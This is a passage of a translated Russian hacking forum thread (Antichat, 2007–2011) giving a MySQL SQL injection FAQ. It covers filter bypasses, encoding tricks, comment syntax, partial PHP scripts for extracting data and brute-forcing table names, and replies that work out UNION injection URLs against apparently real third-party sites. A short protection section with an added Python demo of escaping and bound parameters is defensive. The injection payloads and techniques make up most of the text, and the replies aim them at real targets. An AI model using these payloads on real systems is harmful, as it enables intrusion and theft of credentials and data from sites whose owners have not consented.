4. WHAT TO DO IF SOMETHING IS FILTERED

4.1 Filtered space

For a start, remember that for MySQL a /**/ construct is equal to a space.

What if that construct is filtered too? Everything is elementary: you can use brackets and quotes instead. For example:

Code:

SELECT * FROM news WHERE id='1'UNION(SELECT(1),2,3,4,5,(6)FROM

Such a query executes correctly: the parser needs no whitespace between a quote or a bracket and the next token.

(Just delete the extra, out-of-place spaces; the forum software inserts them.)

4.2 A character or string is filtered

There is an interesting function CHAR() that returns the character with the given code. Suppose some character is filtered... let it be the asterisk (*). First we need to know the code of this character. MySQL has an ASCII() function that returns the code of the leftmost character of the string passed to it, so

Code:

SELECT ASCII('*')

only there is no point running it on the vulnerable host (the '*' is filtered there), run it on a local MySQL. We learn that the code is 42 and use the CHAR() function like this

Code:

SELECT CHAR(42,42,42)

which displays three asterisks.

Another way is to use the hexadecimal code of the string. Now suppose the word admin is filtered. MySQL has a HEX() function that produces the hexadecimal code of a string. It is used like this

Code:

SELECT HEX('admin')

It gives "61646D696E"; we prepend "0x" (so that MySQL understands it is dealing with a hexadecimal literal) and get 0x61646D696E, which can be used without CHAR() like this

Code:

SELECT password FROM User WHERE login=0x61646D696E

A 0x literal compares as a string in a string context, so no quotes are needed around it at all, which is also handy when the quote itself is filtered.

4.3 Problems with encodings

It often happens that you seem to have found all the columns and built the correct query, but when you try to output any string from the database you get, depending on the server configuration, a message about incompatible collations (Illegal mix of collations), or maybe not.

There is an elementary way to put the encoding conversion on MySQL's shoulders. You can use a construct like this:
AES_DECRYPT(AES_ENCRYPT([your request],'bla'),'bla')

But that is no longer fashionable and very cumbersome, and somewhere in the depths of this thread I offered a different, much shorter construct a few years ago:
UNHEX(HEX([your request]))

As they say, everything ingenious is simple: both return a binary string, so the collation of the original column no longer takes part in the UNION.

An example of how this can be used:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,UNHEX(HEX(login)),5,6 FROM Users LIMIT 0,1 --

5. USEFUL FUNCTIONS IN MYSQL

I hope you already know SELECT, INSERT, UPDATE, DELETE, DROP; if not, go and read this book: A great reference to the SQL language.

----------------------------
USER() returns the login under which we are connected to MySQL.
DATABASE() returns the name of the database we are connected to.
VERSION() returns the MySQL version.
----------------------------
ASCII(str) returns the ASCII code of the first character of the string "str".
CHAR(xx1, xx2, ...) returns a string consisting of the characters whose codes are xx1, xx2, etc.
HEX(str) returns the hexadecimal equivalent of the string "str".
----------------------------
LENGTH(str) returns the length of the string "str" in bytes.
SUBSTRING(str, pos [, len]) returns len characters of the string "str" (to the end of the string if len is not given) starting from position pos; positions are counted from 1.
LOCATE(substr, str [, pos]) returns the position of the first occurrence of "substr" in "str", searching from position pos (from the beginning of "str" if not given). Returns 0 if "substr" is not found.
----------------------------
LOWER(str) converts the string "str" to lower case (in my opinion only Latin letters).
CONCAT(param1, param2, ...) joins the substrings into one string.
CONCAT_WS(sep, param1, param2, ...) joins the substrings into one string with the separator sep.
----------------------------
IF(exp, ret1, ret2) checks the condition exp: if it is true (not 0 and not NULL) returns ret1, otherwise returns ret2.
----------------------------
expr BETWEEN min AND max returns 1 if the value of expr is greater than or equal to min and less than or equal to max, otherwise 0.
----------------------------

Now about comments in MySQL

1) # is the MySQL line comment character. Example:

Code:

SELECT pass, login FROM users #This is comment

which is equivalent to the query

Code:

SELECT pass, login FROM users

2) -- is another comment form in MySQL. The space after it is required. Example:

Code:

SELECT pass, login FROM users -- This is comment

3) /* */ is the analogue of the C comment in MySQL. Starting with the 5.1 branch (?) the free ride ends and this kind of comment needs its closing part. MySQL treats the comment itself as whitespace, so /**/ can stand in for a space. Examples:

Code:

SELECT pass, login FROM users /* This is comment

SELECT pass, login /* This is comment */ FROM users
SELECT/**/pass, login/**/FROM/**/users

4) /*!int */ is an extension of the previous comment. Everything inside it is interpreted as part of the SQL query if the MySQL server version is equal to or greater than the number int after the exclamation mark. Example:

Code:

SELECT pass /*!32302 , login */ FROM users

Also returns the login column if the MySQL version is 3.23.02 or higher.

6. HOW TO PROTECT FROM SQL INJECTION

You surely understand that this whole article was written for the sake of this item. All items and sub-items were written only to make the seriousness of the situation clear, and the author of this article is not responsible for the use of these items for purposes contrary to the Criminal Code of the Russian Federation.

And the defence is very simple. By the way, all three rules apply to all three ways of passing information to the server: GET, POST, Cookie.

1) THE MOST IMPORTANT: ESCAPE THE QUOTES.
-------------------------------
2) If the LIKE string comparison operator is used, also escape the characters "%" and "_".
-------------------------------
3) Do not compare variables without quotes, as in SELECT ... WHERE id=$id; write SELECT ... WHERE id='$id' and refer to point 1.

(Rule 1 is the 2007-era answer; the standard answer today is prepared statements with bound parameters (mysqli or PDO), which cover rules 1 and 3 in one go. Rule 2 still applies, because binding a value does not stop % and _ from being wildcards inside LIKE.)
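Rules 1 to 3 side by side, as an added example that is not part of the original post: a Python script against a constructed SQLite copy of the users table from the base dump further down the thread (with an extra numeric id column added for rule 3; SQLite escapes a quote as '' rather than with a backslash, the logic is otherwise the same). It shows that escaping quotes does stop the classic ' OR '1'='1 inside a quoted string, does nothing for an unquoted numeric id or for LIKE wildcards, and that bound parameters close the first two holes while LIKE still needs its own wildcard escaping.

```python
import sqlite3

# Constructed stand-in for the users table from the base dump below, in SQLite
# rather than MySQL, with an extra numeric id column added for rule 3.  SQLite
# escapes a quote as '' instead of \', so that is the spelling of "filter the
# quotes" used here; the logic is the same.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "Admin", "PaSsWoRd"), (2, "vasya", "qwerty")])


def logins(sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]


def by_login_escaped(login):
    """Rule 1 applied: the value is inside quotes and its quotes are escaped."""
    safe = login.replace("'", "''")
    return logins(f"SELECT login FROM users WHERE login='{safe}' ORDER BY id")


def by_id_unquoted(user_id):
    """Rule 3 broken: WHERE id=$id with no quotes, so there is no quote to escape."""
    return logins(f"SELECT login FROM users WHERE id={user_id} ORDER BY id")


def search_like_escaped(prefix):
    """Rule 2 broken: quotes are escaped, but % and _ are still wildcards in LIKE."""
    safe = prefix.replace("'", "''")
    return logins(f"SELECT login FROM users WHERE login LIKE '{safe}%' ORDER BY id")


def by_login_param(login):
    """Bound parameter: the value never becomes part of the SQL text."""
    return logins("SELECT login FROM users WHERE login=? ORDER BY id", (login,))


def by_id_param(user_id):
    """Bound parameter plus the type check rule 3 is really about:
    a non-numeric id is rejected before any SQL is built."""
    if not str(user_id).isdigit():
        return []
    return logins("SELECT login FROM users WHERE id=? ORDER BY id", (int(user_id),))


def search_like_param(prefix):
    """Bound parameter AND wildcard escaping: binding alone does not tame % and _."""
    escaped = prefix.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return logins("SELECT login FROM users WHERE login LIKE ? ESCAPE '\\' ORDER BY id",
                  (escaped + "%",))


if __name__ == "__main__":
    print(by_login_escaped("Admin' OR '1'='1"))   # [] : rule 1 holds
    print(by_id_unquoted("1 OR 1=1"))             # both rows: rule 3 matters
    print(search_like_escaped("%"))               # both rows: rule 2 matters
    print(search_like_param("%"))                 # [] : wildcard escaped
```

The same split holds for PHP's mysqli and PDO: the placeholder handles quoting and the numeric case, the LIKE wildcards are still the application's job.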
Last edited: 28 Apr 2010


7 Jul 2007 #4

Dr.Z3r0
Leaders of the World

7. ADDITIONS

Some free time turned up... I don't know if anyone needs this at all, but as promised...
Vulnerable script code

Code:

<?php
// Database settings
$script['mysql_server']   = 'localhost'; // Host
$script['mysql_login']    = 'root';      // Login
$script['mysql_password'] = '';          // Password
$script['mysql_db']       = 'test';      // Database name

// The script itself

$body = "";
$body .= "<html>
<head><title>News</title></head>
<body>
";

mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']);
mysql_select_db($script['mysql_db']) or die('I can not connect to the database');


Base dump

Code:

CREATE TABLE `news` (
  `id` int(11) NOT NULL default '0',
  `date` varchar(8) NOT NULL default '',
  `time` varchar(7) NOT NULL default '',
  `caption` varchar(50) NOT NULL default '',
  `text` text NOT NULL,
  `avtor` varchar(50) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

INSERT INTO `news` VALUES (1, '23/03/07', '12:30', 'Hello vasya :)', 'Well, start
INSERT INTO `news` VALUES (2, '24/03/07', '11:10', 'Gee, and this is for a change

CREATE TABLE `users` (
  `login` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');

In general, I hope you understand what to do with this...

And now something more useful.

Script to display information through LIMIT or something else of this kind

Code:

$header .= 'Cookie2: $Version=1'."\r\n";
$header .= "Host: ".$set['h']."\r\n\r\n";

$dt = "";
$fp = fsockopen($set['h'], 80);
fwrite($fp, $header);
while (!feof($fp)) $dt .= fread($fp, 1024);
fclose($fp);

// Cut out the necessary info
$dt = substr($dt, strpos($dt, $set['b']) + strlen($set['b']));
$dt = substr($dt, 0, strpos($dt, $set['e']));

// Display info on screen
echo($dt."\r\n");
flush();
}

Script for brute-forcing table and column names

Code:

fwrite($fp, $header);
while (!feof($fp)) $dt .= fread($fp, 1024);
fclose($fp);

// And accordingly output to the screen
$found = 0;
if ($set['t'])
{
    if (substr_count($dt, $in_str) > 0) {echo("<font color='green'><b>".$t
}
if ($set['t'] === false)
{
    if (substr_count($dt, $ou_str) === 0) {echo("<font color='green'><b>".
}
if ($found === 0) echo("<font color='red'>".$tables_names[$i]."</font>");
echo("<hr>\r\n");

flush();
}

Last edited: 31 May 2011


7 Jul 2007 #5

.Slip
Elder

_Great_ said:

In general, this is not the first article on this topic. They are written with enviable regularity, almost every 2 weeks.

I agree, but this is the most complete collection of them all.

By the way, it is much better than the featured topic:

https://forum.antichat.ru/threadnav19605-1-10.html

7 Jul 2007 #6

Abra
Member

To what? To the fact that I didn't write it, or to the fact that this is a joke?

I think it is to the fact that the statement "the most important thing is to filter the quotes" is not right. "Filtering does not need anything at all" is not right.

4 Oct 2007 #7

[53x]Shadow
Leaders of Antichat

Update

Addition

There are system variables in MySQL:

@@basedir
@@datadir
@@tmpdir
@@version_compile_os

Query example:

Code:

http://www.site.com/index.php?id

With their help you can find out the paths:

- to the MySQL configuration files (my.ini, my.cnf);
- to the MySQL logs (hostname.err, mysql.log, mysql.err, etc.);

In some cases, if there is a local file inclusion, it is possible to upload a shell through the MySQL logs (as through the Apache logs).

Using @@version_compile_os you can determine the OS type.

Often, but not always, you can determine the OS type through version(): if the returned version string contains
"-log", it means a *nix/linux OS,
"-nt" means a Windows-type OS.

4 Nov 2007 #8

HornetBlack
Member

Everything in the FAQs is good, but they don't really cover one question: the variants of the queries used in the scripts. Example:
this query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php?id=3+union+select+1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? I note right away that a quotation mark or parenthesis after the parameter value gives an error.

It is clear that besides the simplest SELECT x FROM t WHERE p='nn' query there can be more complex variants, including ones using brackets. I would like to know the methods by which you can "work out" the structure of the query. Any ideas?

4 Nov 2007 #9

c411k
Members of Antichat

HornetBlack said:

Everything in the FAQs is good, but they don't really cover one question: the variants of the queries used in the scripts. Example:
this query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php?id=3+union+select+1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? I note right away that a quotation mark or parenthesis after the parameter value gives an error.

It is clear that besides the simplest SELECT x FROM t WHERE p='nn' query there can be more complex variants, including ones using brackets. I would like to know the methods by which you can "work out" the structure of the query. Any ideas?

Put a comment.
order by 4/*
select 1,2,3,4/*

4 Nov 2007 #10

Scipio
Members of Antichat

HornetBlack said:

Well, I'm not such a novice

http://www.soaw.org./article.php?id=322+union+select+1,2,3,4/*
The used SELECT statements have a different number of columns
The comment has no effect either on order by or on union. If I am not mistaken, this indicates that the parameter is the last one in the query and there are no order by and limit clauses.

In general, imagine such rubbish, there are two queries in a row:

Code:

"select id, name, login, password, description from table where id=".$id.";"
"select id, name, login, password from table where id=".$id.";"

you enter as input: $id = -1 order by 4/*

in the end everything will look like this:

Code:

"select id, name, login, password, description from table where id=-1 order by 4/*
"select id, name, login, password from table where id=-1 order by 4/*

as you see, there should be no errors

if you put $id = -1 order by 5/* then the second query will give an error

Unknown column '5' in 'order clause'

and you think there are 4 fields... then

you insert the injection:

$id = -1 union select 1,2,3,4/*
and right away the first query spits out the error

The used SELECT statements have a different number of columns

because in the first query there are 5 fields

if you insert the injection:
$id = -1 union select 1,2,3,4,5/*

then this error will be spat out by the second query...

this is the whole reason for your troubles...

in this situation it is only possible to use subqueries

Last edited: 4 Nov 2007

4 Nov 2007 #11

HornetBlack
Member

Scipio said:

because in the first query there are 5 fields

if you insert the injection:
$id = -1 union select 1,2,3,4,5/*
then this error will be spat out by the second query...
this is the whole reason for your troubles...

The idea is clear, but... is combining queries through ";" allowed in MySQL at all?
However, this is a special case of trouble, so I would really like to see in some FAQ an analysis of possible query constructions in scripts and injection variants.

4 Nov 2007 #12

ENFIX
Elder

> Is combining queries through ";" allowed in MySQL at all?

In the MySQL command line, yes.
And in functions, for example mysql_query(), no, because it must return a result, and only one.

4 Nov 2007 #13

Scipio
Members of Antichat

HornetBlack said:

The idea is clear, but... is combining queries through ";" allowed in MySQL at all?
However, this is a special case of trouble, so I would really like to see in some FAQ an analysis of possible query constructions in scripts and injection variants.

I wasn't assuming that this was PHP code.

I just gave an example, theoretical so to speak, for better understanding, so that you don't have to bother with the language syntax as well.

> this is a special case of trouble

Special, but sometimes (relatively often) encountered...

> see an analysis of possible query constructions in scripts and injection variants.

There probably are none, since the query constructions and the implementation of the injections depend on the specific case, while the general things common to all (most) cases are already covered in detail (even too much so).

4 Nov 2007 #14

HornetBlack
Member

Scipio said:

> see an analysis of possible query constructions in scripts and injection variants.

There probably are none, since the query constructions and the implementation of the injections depend on the specific case, while the general things common to all (most) cases are already covered in detail (even too much so).

That's exactly the trouble: the FAQs copy from each other, but I'd like to see more real examples of solving problems like these.
If anyone is interested, dig into this example and suggest solutions:
http://www.soaw.org./article.php?id=322
Here is another puzzle:
http://www.remhq.com/news_story.php?id=593
17 fields, but it won't let me find out the MySQL version: the version, user and database functions seem to be filtered, though there is XSS in the fields.

4 Nov 2007 #15

Scipio
Members of Antichat

HornetBlack said:

That's exactly the trouble: the FAQs copy from each other, but I'd like to see more real examples of solving problems like these.
If anyone is interested, dig into this example and suggest solutions:
http://www.soaw.org./article.php?id=322
Here is another puzzle:
http://www.remhq.com/news_story.php?id=593
17 fields, but it won't let me find out the MySQL version: the version, user and database functions seem to be filtered, though there is XSS in the fields.

Well, without elementary knowledge of SQL no FAQ will help; here you need your own approach, and you need to think a little....

now, your examples

No. 1 is roughly what I was telling you about; subqueries will help here.

No. 2: the error occurs because of the encoding, here is a working variant:

Code:

http://www.remhq.com/news_story.php?id=555592'%20union%20select%201,2,aes_decrypt(aes_encr

you can look up the bypass of this error in other FAQs and articles on MySQL injections, of which there are countless on the net... in such cases you can use the construct I gave you; this construct is explained in other articles and FAQs on MySQL injections.
Last edited: 4 Nov 2007

4 Apr 2008 #16

beerhack
Elder

I-I()/Ib said:

AES_DECRYPT(AES_ENCRYPT('строка'),'bla'),'bla')

The number of opening and closing brackets here doesn't match.

So what's the correct form?

7 Apr 2008 #17

Dr.Z3r0
Leaders of the World

beerhack said:

The number of opening and closing brackets here doesn't match.

So what's the correct form?

A typo. This is the correct form:

Code:

AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla')

7 Apr 2008 #18

Qwazar
Elder

If error reporting is turned off, then in this case the presence of the vulnerability can be determined like this:
http://xxx/news.php?id=1'; --

...

Thus for MySQL the query stays the same and the same thing is displayed as for
http://xxx/news.php?id=1

There's a chance that the script simply cuts off everything after the digits.

7 Apr 2008 #19

Scipio
Members of Antichat

Qwazar said:

There's a chance that the script simply cuts off everything after the digits.

If a script filters, escapes, cuts off, replaces, blocks or restricts something in such a way that it is impossible to use an injection, then that is called "there is no injection"; what is your post doing here? The topic is specifically about injections.

7 Apr 2008 #20

Qwazar
Elder

To the fact that the proposed way of checking for the presence of an injection gives no definite certainty that the injection exists.

Although it was stated:

If error reporting is turned off, then in this case the presence of the vulnerability can be determined like this
